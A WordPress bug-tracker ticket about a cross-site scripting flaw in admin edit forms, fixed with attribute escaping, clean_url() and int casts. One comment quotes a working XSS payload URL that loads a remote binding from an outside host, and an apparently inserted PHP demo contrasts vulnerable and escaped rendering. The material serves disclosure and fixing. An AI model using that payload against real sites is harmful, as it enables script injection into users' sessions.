Ticket #4333 (closed defect: fixed)

Opened 1 year ago

Last modified 1 year ago

Some attribute_escape()s and relatives for edit forms

Reported by: mdawaffe
Assigned to: anonymous
Priority: high
Milestone: 2.2.1
Component: Administration
Version: 2.2
Severity: normal
Keywords:
Cc:

Attachments

4333.diff (19.3 kB) - added by mdawaffe on 05/24/07 21:47:15.
UserEdit_Fix_Trunk.patch (0.6 kB) - added by g30rg3x on 05/26/07 05:31:02.
User-Edit.php Fix for trunk
Fix_22.patch (17.5 kB) - added by g30rg3x on 05/27/07 04:59:37.
Patch for milestone 2.2, based on trunk changeset #5543

Change History

05/24/07 21:47:15 changed by mdawaffe

  • attachment 4333.diff added.

05/24/07 22:00:34 changed by ryan

The int casts can go in get_category_to_edit() and the other to_edit() functions since we always want them to be ints. attribute_escape() needs more context, so calling it from the forms is good.

05/24/07 22:06:42 changed by rob1n

  • owner changed from anonymous to rob1n.

Also, looks like we could use some selected()s in there.

05/25/07 09:41:05 changed by ryan

(In [5543]) attribute_escape()s and int casts. see #4333

05/25/07 14:46:12 changed by rob1n

  • status changed from new to closed.
  • resolution set to fixed.

Looks like those <select>s' options aren't going to work with selected().

05/25/07 21:04:24 changed by markjaquith

  • status changed from closed to reopened.
  • resolution deleted.
  • milestone changed from 2.3 to 2.2.1.

Also needs to go into 2.2.1 and 2.0.11

05/25/07 22:33:48 changed by markjaquith

(In [5550]) attribute_escape()s and int casts for 2.0.x: see #4333

05/25/07 22:36:26 changed by markjaquith

2.2.1 remains.

05/26/07 05:28:44 changed by g30rg3x

Well, I made some trunk-based patches for 2.2.
Obviously I didn't add anything that has to be related to the trunk version.

Also, I think that the trunk solution is incomplete because it doesn't filter the user-edit.php-based version of the bug:
user-edit.php?user_id=1&wp_http_referer=%22style=-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22)'
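The two fixes discussed in this ticket (int casts on the id parameters in ryan's comment above, and attribute escaping / clean_url() on the wp_http_referer value in the user-edit.php payload just quoted) as an added, stand-alone example; this is not WordPress code and not any of the attached patches. The payload works because the referer is echoed straight into a hidden input's value="..." attribute, so a leading %22 closes the attribute and a style= attribute with a -moz-binding URL follows. attr_escape() and clean_referer() below are assumed stand-ins for attribute_escape() and clean_url() (htmlspecialchars() with ENT_QUOTES, and a character whitelist plus scheme check); the request array is constructed to mirror the ticket's URL.

```php
<?php
// Added example, not WordPress code. Demonstrates the pattern behind #4333:
// a request parameter echoed into an HTML attribute unescaped, and the two
// countermeasures the ticket settles on (int casts, attribute escaping /
// URL cleaning). attr_escape() and clean_referer() are assumptions standing
// in for WordPress's attribute_escape() and clean_url().

// Constructed request, decoded from the URL quoted in the ticket,
// with a non-numeric user_id added to show the int cast.
$request = array(
    'user_id'         => '1 OR 1=1',
    'wp_http_referer' => '"style=-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")\'',
);
$benign_referer = '/wp-admin/users.php?updated=true';

// Vulnerable rendering: the raw value lands inside value="...", so a
// double quote in it terminates the attribute and injects a new one.
function render_referer_vulnerable($referer) {
    return '<input type="hidden" name="wp_http_referer" value="' . $referer . '" />';
}

// Stand-in for attribute_escape(): a value escaped this way can no longer
// close the surrounding quoted attribute.
function attr_escape($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Stand-in for clean_url(): strip characters that have no place in a URL,
// accept only http(s) URLs or site-relative paths, then attribute-escape.
function clean_referer($url) {
    $url = preg_replace('|[^a-z0-9~+_.?#=!&;,/:%@$*\'()\[\]-]|i', '', $url);
    if ($url === '' || (!preg_match('#^https?://#i', $url) && $url[0] !== '/')) {
        return '';   // not a usable referer; drop it rather than echo it
    }
    return attr_escape($url);
}

function render_referer_escaped($referer) {
    return '<input type="hidden" name="wp_http_referer" value="' . attr_escape($referer) . '" />';
}

function render_referer_cleaned($referer) {
    return '<input type="hidden" name="wp_http_referer" value="' . clean_referer($referer) . '" />';
}

// Int cast on the id, as [5543] does in the *_to_edit() helpers:
// anything after the leading digits is discarded.
$user_id = (int) $request['user_id'];

echo "user_id after (int) cast: $user_id\n\n";
echo "vulnerable:  " . render_referer_vulnerable($request['wp_http_referer']) . "\n";
echo "escaped:     " . render_referer_escaped($request['wp_http_referer']) . "\n";
echo "cleaned:     " . render_referer_cleaned($request['wp_http_referer']) . "\n\n";
echo "benign, cleaned: " . render_referer_cleaned($benign_referer) . "\n";
```

Run it with the PHP CLI: the vulnerable line shows the attribute break-out (`value=""style=-moz-binding:...`), the escaped line keeps the whole payload inert inside the attribute as `&quot;style=...`, the cleaned line drops the payload entirely because it is neither an http(s) URL nor a site-relative path, and the benign site-relative referer passes through unchanged.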

05/26/07 05:31:02 changed by g30rg3x

  • attachment UserEdit_Fix_Trunk.patch added.

User-Edit.php Fix for trunk

05/27/07 04:59:37 changed by g30rg3x

  • attachment Fix_22.patch added.

Patch for milestone 2.2, based on trunk changeset #5543

05/28/07 19:47:21 changed by rob1n

  • owner changed from rob1n to anonymous.
  • status changed from reopened to new.

05/29/07 04:35:23 changed by markjaquith

(In [5588]) use clean_url(). Nice catch, g30rg3x. see #4333 for trunk

05/29/07 04:37:36 changed by markjaquith

  • status changed from new to closed.
  • resolution set to fixed.

(In [5589]) Int casting and misc escaping for 2.2 Props g30rg3x. fixes #4333 for 2.2